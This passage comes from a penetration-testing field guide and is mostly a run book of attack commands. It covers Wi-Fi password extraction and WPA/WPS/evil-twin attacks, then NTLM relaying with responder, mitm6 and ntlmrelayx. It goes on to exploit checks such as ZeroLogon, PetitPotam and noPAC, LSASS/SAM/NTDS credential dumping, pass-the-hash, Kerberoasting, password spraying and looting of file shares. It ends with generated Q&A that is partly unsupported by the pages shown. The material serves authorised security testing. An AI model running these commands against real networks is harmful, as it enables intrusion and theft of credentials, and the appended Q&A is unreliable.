Internal Security Assessment: Field Guide Page 42


netsh wlan show profile name=WIFI_NAME key=clear

Look for the “Key Content” line, the cleartext password will be there.

OR

crackmapexec smb <ip> -u user -p pass -M wireless

*NIX

sudo cat /etc/NetworkManager/system-connections/{SSID} | grep psk=

sudo grep psk= /etc/NetworkManager/system-connections/*

OR

sudo cat /etc/wicd/[Link]

Internal Security Assessment: Field Guide Page 43


WIRELESS

Internal Security Assessment: Field Guide Page 44


WPA/WPA2 H ASH C APTURE WITH U SERS
#Will work with a cheap Atheros wireless USB LAN adapter
Automate
[Link]
[Link]

./[Link]

OR

./[Link]

1) Select wlan0
2) Put interface in monitor mode (option 2)
3) Select Handshake tools menu (option 5)
4) Explore targets (option 4)
5) Capture Handshake (option 5)

Run manually

airmon-ng

airmon-ng start wlan0

airodump-ng wlan0mon or airodump-ng -b a wlan0mon

airodump-ng wlan0mon -c 3 -t wpa -d [Link] -w capture

#*-c = channel *-d=BSSID

aireplay-ng -0 1 -a [Link] -c [Link] wlan0mon

#*-a=BSSID *-c=client

WPA/WPA2 H ASH C APTURE WITHOUT U SERS (PMKID)


#Will work with a cheap Atheros wireless USB LAN adapter
Automate via Wifite
[Link]

./[Link]

Internal Security Assessment: Field Guide Page 45


Run manually
[Link]
[Link]

airmon-ng

airmon-ng start wlan0

airodump-ng --ivs wlan0mon

echo "BSSID">[Link]

hcxdumptool -o [Link] -i wlan0 --filterlist=[Link] --filtermode=2 --enable_status=1 -c 1

hcxpcaptool -E essidlist -I identitylist -U usernamelist -z cap01.16800 [Link]

WPS
#Will work with a cheap Atheros wireless USB LAN adapter
Automate via airgeddon
[Link]

./[Link]

1) Select wlan0
2) Put interface in monitor mode (option 2)
3) Select WPS attack menu (option 8)
4) Explore targets (option 4)
5) Run through list (7-13)

E NTERPRISE W IRELESS
#Will work with a cheap Atheros wireless USB LAN adapter
Automate via airgeddon
[Link]

./[Link]

1) Select wlan0
2) Put interface in monitor mode (option 2)
3) Select Enterprise attack menu (option 10)

Internal Security Assessment: Field Guide Page 46


4) Create company specific certificate (option 5)
5) Select Smooth mode Enterprise Evil Twin (option 6)

Password Spray
[Link]

./eaphammer --eap-spray –I wlan0 –e SSID_EXAMPLE --user-list [Link] –password Summer2019

Password Reuse

If certificates are not validated, use a compromised AD username and password.

E VIL T WIN ( SOCIAL E NGINEERING )


#Will work with a cheap Atheros wireless USB LAN adapter
Automate via airgeddon
[Link]

./[Link]

1) Select wlan0
2) Put interface in monitor mode (option 2)
3) Select Evil Twin menu (option 7)
4) Select option 7-9 based on OPSEC requirement

O PEN W IRELESS
Nmap internal IP addresses and or hostnames.

WEP W IRELESS
#Will work with a cheap Atheros wireless USB LAN adapter
Automate
[Link]
[Link]

./[Link]

OR

Internal Security Assessment: Field Guide Page 47


./[Link]

1) Select wlan0
2) Put interface in monitor mode (option 2)
3) Select Handshake tools menu (option 5)
4) Explore targets (option 4)
5) WEP attack (option 5)

Internal Security Assessment: Field Guide Page 48


METHODOLOGY

Internal Security Assessment: Field Guide Page 49


I NTERNAL R UN B OOK F OR M OST W INDOWS N ETWORKS (Q UICK
A CCESS )

Asset discovery is generally time consuming, slow and produce lots of network traffic. I often spend the
first 30 min of my time running responder and MITM6 in an attempt gain credentials. I then move into
authenticated asset discovery.
1) Look for a very quick wins with before anything else. If attacks fail, move onto #2.
crackmapexec smb <Domain Controller> -u '' -p '' -M petitpotam
crackmapexec smb <Domain Controller> -u '' -p '' -M zerologon
crackmapexec smb <Domain Controller> -u '' -p '' –users -o [Link]
a. cme ldap [Link] -u [Link] -p '' --asreproast [Link]
a. ./[Link] -m 118200 -O -w 3 ./[Link] /opt/[Link]
b. wget [Link] -O [Link]
c. cme smb <Domain Controller> -u '' -p '' --pass-pol
d. [Link] -smb <targetIP> <usernameList> <passwordList>
<AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
crackmapexec smb <subnet> -u '' -p '' -M ms17-010

2) Gather hashes. Careful this can cause certificate issues, among other things and potentially
DoS users.
responder -I eth0 -Pdv
a. sort -u -t: -k1,1 /usr/share/responder/logs/*.txt

3) Legacy services may be disabled. mitm6 may produce more hashes. I like to use the IP range of
my local subnet. Careful this can cause certificate issues, among other things and potentially
DoS users.
crackmapexec smb <subnet> --gen-relay-list [Link]
mitm6 -i eth0 -d [Link]
[Link] -6 -wh $attacker_ip -of loot -tf [Link] -smb2support
a. Check local directory for hashes and SAM dumps. If a SAM hash is obtained Pass The
Hash to other domain PCs.
crackmapexec smb <ip> -u admin -H blahblah -M hash_spider
crackmapexec smb <subnet> -u admin -H blahblah -lsa

Internal Security Assessment: Field Guide Page 50


a) cat /root/.cme/logs/*.secrets |sort -u
crackmapexec smb <subnet> -u admin -H blahblah -M lsassy

4) Crack the hashes. Most of the time you will get NTLMv2 (5600) hashes on modern
environments. If the hashes don’t crack. Continue relaying (preferably off hours). SMB
Signing may be enabled.
./[Link] -m 5600 -O -w 3 /opt/customer/admin_hash.txt /opt/wordlist/all_wordlists.txt
./[Link] -m 5600 -O -w 3 /opt/customer/admin_hash.txt /opt/wordlist/[Link] -r
/usr/share/hashcat/rules/[Link]

#If passwords are cracked, start moving laterally.


5) Figure out roles of each account. We are looking for admins.
crackmapexec ldap [Link] -u username -p password --admin-count
OR
ldapdomaindump -u SITTINGDUCK\\notanadmin -p QWERTY dc-ip
OR
[Link] --healthcheck --server <DOMAIN_CONTROLLER_IP> --user <USERNAME> -
-password <PASSWORD>
OR
bloodhound-python -u <USERNAME> -p <PASSWORD> -c all
a. cat [Link]|jq -r '.users[] | .Properties |select(.admincount==true) |.name'

6) Are the creds Admin?


a. Are the creds LOCAL Admin?
Automated
crackmapexec smb <ip> -u admin -H blahblah -M hash_spider
Manual
i. I like to make a quick list of hosts to target.
crackmapexec ldap <Domain Controller> -u admin -p password -M subnets
ii. Dump SAM file in an attempt to pass the hash.
crackmapexec smb AD_Computers.txt -u admin -p password -sam

Internal Security Assessment: Field Guide Page 51


1) Once hash is obtained Pass The Hash to other domain PCs.
crackmapexec smb AD_Computers.txt -u admin -H blahblah -lsa
cat /root/.cme/logs/*.secrets |sort -u
iii. Dump LSASS in an attempt to escalate privileges.
crackmapexec smb AD_Computers.txt -u admin -p password -lsa
cp /root/.cme/logs/*.secrets |sort -u
iv. Dump LSASS in an attempt to escalate privileges. Note, this often returns more
creds but is not stored in the DB or in logs.
crackmapexec smb AD_Computers.txt -u admin -p password -M lsassy
b. Are the creds Domain Admin?
crackmapexec smb [Link] -u UserNAme -p 'PASSWORDHERE' --ntds
crackmapexec smb [Link] -u UserNAme -p 'PASSWORDHERE' --ntds vss

7) Are the creds a basic user?


a. Impersonate Domain Admin with noPAC
crackmapexec smb <Domain Controller> -u 'user' -p 'pass' -M nopac

b. Try the printer bug attack.


crackmapexec smb <Domain Controller> -u 'user' -p 'pass' -M spooler
a. python3 [Link] -t DCSYNC://[Link] -smb2support
b. python3 [Link] -no-ping
[Link]/username:password@[Link] <ATTACKERIP>

c. Look for passwords in user descriptions.


crackmapexec ldap <Domain Controller> -u 'user' -p 'pass' -M user-desc
OR
crackmapexec ldap <Domain Controller> -u 'user' -p 'pass' -M get-desc-users
d. Make a list of users to password spray. Make sure password policy is followed.
ldapdomaindump -u SITTINGDUCK\\notanadmin -p QWERTY dc-ip
OR

Internal Security Assessment: Field Guide Page 52


bloodhound-python -u <USERNAME> -p <PASSWORD> -c all
cat [Link]|jq -r '.users[] | .Properties |.name' |cut -d @ -f1
i. Execute password spray
[Link] -smb <targetIP> <usernameList> <passwordList>
<AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
OR
crackmapexec smb [Link] -u [Link] -p Summer2022!
e. Look for privilege escalation attack vectors via AD.
[Link] --healthcheck --server <DOMAIN_CONTROLLER_IP> --user
<USERNAME>@[Link] --password <PASSWORD>
#PingCastle will provide a lot of a results. These are the most common.
i. ASREPRoast
crackmapexec ldap <Domain Controller> -u [Link] -p '' --asreproast [Link]
crackmapexec ldap <Domain Controller> -u username -p pass --asreproast
[Link]
ii. Kerberoast
crackmapexec ldap <Domain Controller> -u username -p pass --kerberoasting
[Link]
iii. Find autologon information
crackmapexec smb <Domain Controller> -u username -p pass -M gpp_autologin
iv. Abuse AD CS
certipy 'example/john:Passw0rd@[Link]' auto
v. GPP Passwords.
crackmapexec smb <Domain Controller> -u username -p pass -M gpp_password

8) If you can’t crack the hashes, Pass the Hash from the SMB relay attack.
a. Basic users can create computer accounts. This can help gain a foothold into AD.
mitm6 -hw icorp-w10 -d [Link] --ignore-nofqnd
[Link] -t ldaps://[Link] --add-computer
b. Combine mitm6, ntlmrelayx and RBCD to abuse AD defaults.

Internal Security Assessment: Field Guide Page 53


mitm6 -hw icorp-w10 -d [Link] --ignore-nofqnd
[Link] -t ldaps://[Link] -wh attacker-wpad --delegate-access
[Link] -spn cifs/[Link] [Link]/NEW_PC_NAME\$ - impersonate admin
export KRB5CCNAME=[Link]
[Link] -k -no-pass [Link]
c. Relay an SMB authentication request to the DC. If it’s a DA account and vuln to CVE-
2019-1019, it will make a new DA account.
mitm6 -hw icorp-w10 -d [Link] --ignore-nofqnd
[Link] -t ldaps://[Link] -smb2support --remove-mic

9) Find subnets user/servers are on.


bloodhound-python -u username -p Password123 -c all
cat [Link]|jq -r '.computers[] | .Properties |.name' > [Link]
nmap -p445 -Pn -oG - -iL [Link] | awk '/open/{print $2}' | cut -d '.' -f1,2,3 |sort -u |sed
's/$/.0\/24/'

10) Dump AD subnets.


crackmapexec ldap <Domain Controller> -u 'user' -p 'pass' -M subnets
OR
.\[Link] -username=testuser -password="testpass!" -domain="[Link]"
-dc="[Link]" -unsafe
OR
[Link] --healthcheck --server <DOMAIN_CONTROLLER_IP> --user <USERNAME> -
-password <PASSWORD>
[Link] --hc-conso

11) Dump DNS records and find internal records to avoid going out of scope.
crackmapexec smb <Domain Controller> -u 'user' -p 'pass' -M enum_dns
OR
adidnsdump -u DOMAIN\\notanadmin <target>

Internal Security Assessment: Field Guide Page 54


OR
[Link] --Domain [Link] --Username user --Password pass --Choice 1
12) Pillage files for sensitive data to show impact.
manspider [Link]/24 -f passw user admin account network login logon cred -d evilcorp -u
bob -p Passw0rd
OR
crackmapexec smb [Link] -u 'user' -p 'pass' -M spider_plus
a. Dump all filenames to your local drive
crackmapexec smb [Link] -u 'user' -p 'pass' -M spider_plus -o
READ_ONLY=false
b. Browse to the SMB share. Download for impact.
smbclient '//[Link]/C$' -U Administrator --pw-nt-hash blahblahblah -
W [Link]
OR
#Prompt for password.
smbclient '//[Link]/C$' -U Administrator -W [Link]
#ls - lists files
#cd - directories
#mget - download file(s)

13) Look for default creds on network equipment and applications.


cat [Link] | naabu -silent | httpx -silent -c 500 | nuclei -severity critical, high, medium
AND/OR
nmap --script http-default-accounts -iL [Link]
AND/OR
cat [Link] | httpx | ffuf -w - -u FUZZ -mr "assword"

14) Kick off vulnerability scanner to fill any gaps and exploit as needed.
#Need to find low hanging fruit quickly?
Run Nessus file through [Link]

Internal Security Assessment: Field Guide Page 55


a. Check for things that Nessus can’t that may be risks but didn’t need to exploit.
crackmapexec smb <Domain Controller> -u Administrator -p 'Password123!' -M
dfscoerce
crackmapexec smb <Domain Controller> -u 'user' -p 'pass' -M nopac
crackmapexec smb <Domain Controller> -u Administrator -p 'Password123!' -M
shadowcoerce
crackmapexec smb <Domain Controller> -u Administrator -p 'Password123!' -M
petitpotam
crackmapexec ldap <Domain Controller IP> -u Administrator -p 'Password123!' -M
ldap-checker --kdcHost [Link]
crackmapexec ldap <Domain Controller> -u Administrator -p 'Password123!' -M ldap-
signing

15) Manually look at each application through a screenshot tool. Check for default creds. Google
vendor passwords if you have internet access.

a. Screenshot web applications


eyewitness -x [Link] --active-scan --web

b. List web apps with a credential page


cat [Link] | httpx –threads 500 -ms "assword"

Internal Security Assessment: Field Guide Page 56


Thank You for Your Contribution
• @Derek_Carlin
• @_dirkjan
• @byt3bl33d3r
• Rjohnsondev
• @netbiosX
• AlessandroZ
• @arvanaghi
• Nikallass
• @agsolino
• @PythonResponder
• @gentilkiwi
• @harmj0y
• @mysmartlogon
• Atom
• @xerosecurity
• @ztgrace
• Folks at SySS Research
• Contributors to Metasploit
• @bonsaiviking
• @ErrataRob
• x90skysn3k
• @DanHMcInerney
• @derv82
• @s0lst1c3
• @mpgn_x64
• @nixfreax

Internal Security Assessment: Field Guide Page 57

Common questions

Powered by AI

Privilege escalation strategies using service account abuse typically involve techniques such as Kerberoasting, where attackers retrieve Kerberos Service Principal Names (SPN) containing hashed service account passwords. These hashes can then be cracked offline to gain credentials for accounts with elevated privileges. The guide details tools like GetUserSPNs.py for pulling SPNs for Kerberoasting, highlighting sidestepping the usual account controls by targeting service accounts known for using weaker passwords. These accounts often have significant privileges, making them primary targets for escalations .

Manual techniques for finding plaintext passwords often require detailed knowledge and exhaustive time-consuming review, where scripts and tools might be misfocused or miss subtler data. Conversely, automated tools like MailSniper and MANSPIDER are highly efficient in scanning large volumes of files and email stores across systems, often uncovering hidden or overlooked plaintext passwords rapidly. However, the effectiveness of these tools depends on their configuration and the sophistication of obfuscation techniques employed by defenders. This dichotomy points to the tool's capacity to quickly expose low-hanging fruit while also requiring manual importing for more concealed password entries .

Automated credential dumping and extraction tools significantly facilitate advanced persistent threats (APT) by streamlining the process of obtaining sensitive data necessary for lateral movement and prolonged access within a network. Tools outlined like Crackmapexec for SMB credential dumping or Mimikatz for LSA secrets enable attackers to quickly locate and extract hashes, which can be used in subsequent techniques like Pass the Hash or Pass the Key attacks. This automated approach reduces time-to-entry for attackers and supports maintaining a foothold over time, as credentials can be constantly harvested and updated .

The guide discusses several methodologies for abusing Kerberos tickets within Windows environments to elevate privileges. A notable method is Pass the Ticket (PTT), where harvested tickets are injected into other user sessions to impersonate administrative users without needing credentials. Tools like Mimikatz can be used to extract Kerberos tickets, while Rubeus allows for injecting these tickets. This process of manipulating Kerberos tickets can further lead to gaining heightened access privileges, such as through Golden or Silver tickets, creating long-term backdoors via Ticket Granting Service (TGS) abuse. These tactics highlight the complexity and potential for elevation in privilege and lateral movement within compromised networks .

The use of tools like Mimikatz and Crackmapexec for remote LSA dumping and credential pilfering represents a significant threat to enterprise security models. These tools enable attackers to extract sensitive credential data from memory, often gaining critical insights into user passwords and hashes that facilitate further victimization of the network. The attack efficiency these tools provide can undermine even robust security postures, as they exploit inherent vulnerabilities in authentication and session management. Moreover, they stress the importance of vigilant monitoring and network segregation practices to diminish successful spread upon initial compromise .

Automating the progression from local to domain admin, as described in the guide, significantly complicates network defense strategies. Techniques such as automating DeathStar to escalate from local to domain admin highlight the challenges defenders face with rapid privilege escalation attacks. These automated methods mean that attackers can quickly elevate privileges across the network, often before detection systems can respond appropriately. The impact on defense strategies is profound, necessitating advanced response mechanisms like behavioral anomaly detection, rigorous access controls, and regular audit of permissions to counteract the speed and automation of such escalations .

Uncredentialed reconnaissance, as detailed in the guide, poses significant risks and benefits. The primary benefit is its stealth; without needing any credentials, attackers can map network structures, discover vulnerable hosts, and infer service configurations with minimal detection risk. Techniques such as ARP scanning, NetBIOS, and limited port scanning using tools like nmap are listed. However, the risks include potential detection by network defense systems if the reconnaissance activities generate traffic patterns typical of malicious scanning, which could lead to increased scrutiny and mitigative actions by defenders .

Gaining an initial foothold through default credentials is critical for compromising network security as it provides attackers with the entry point into systems that can lead to further exploitation and privilege escalation. The field guide outlines the use of default credentials as a method for initial access, suggesting that attackers can utilize these well-known credentials to infiltrate systems, subsequently using techniques for remote user to admin escalation and various credential acquisition tactics, such as Pass the Hash and Pass the Key. For example, automated tools like Metasploit can exploit systems with default credential vulnerabilities to gain unauthorized access .

The field guide suggests bypassing IPv4 NAC by leveraging IPv6, as many defensive tools are primarily focused on IPv4. This involves forcing traffic over IPv6 to often go undetected, potentially allowing malicious activities without challenges. Specific tools and techniques used include using Metasploit to validate the presence of IPv6, employing tools like mitm6 for man-in-the-middle attacks over IPv6 SMB shares, and using impacket tools like responder for similar purposes. This approach highlights a significant security gap, as many networks may not monitor IPv6 traffic rigorously, presenting a substantial risk if left unaddressed .

Vulnerability scanners are crucial in identifying security weaknesses by providing automated assessments of the network to spot well-known vulnerabilities quickly. The guide suggests utilizing tools like Nessus to fill security gaps and identify potential exploitation targets. However, it emphasizes the importance of manually cross-referencing scanner outputs to identify risks that might not be reflected by automated tools, recommending manual checks and additional verification with tools such as Crackmapexec for more nuanced assessments beyond standard vulnerabilities reports .

Internal Security Assessment: Field Guide Page 1 Table of Contents RECONNAISSANCE ...............................
Internal Security Assessment: Field Guide Page 2 INTERNAL RUN BOOK FOR MOST WINDOWS NETWORKS (QUICK ACCESS) ......
Internal Security Assessment: Field Guide Page 3 REC ONNAI SSANCE
Internal Security Assessment: Field Guide Page 4 IPV4 NETWORK ACCESS CONTROL (NAC) BYPASS Bypass IPv4 with IPv6
Internal Security Assessment: Field Guide Page 5 ntlmrelayx.py -t ldaps://icorp-dc.internal.corp -wh attacker-wpad
Internal Security Assessment: Field Guide Page 6 Mass Scan masscan <CIDR>‐‐top-ports 100 DNS/DC Enumeration f
Internal Security Assessment: Field Guide Page 7 Username Enumeration # Bruteforce and enumerate valid Active D
Internal Security Assessment: Field Guide Page 8 AUTHENTICATED ASSET/USERNAME DISCOVERY Basic User and Host Dum
Internal Security Assessment: Field Guide Page 9 crackmapexec ldap example.local -u USERNAME -p PASSWORD --admin-c

You might also like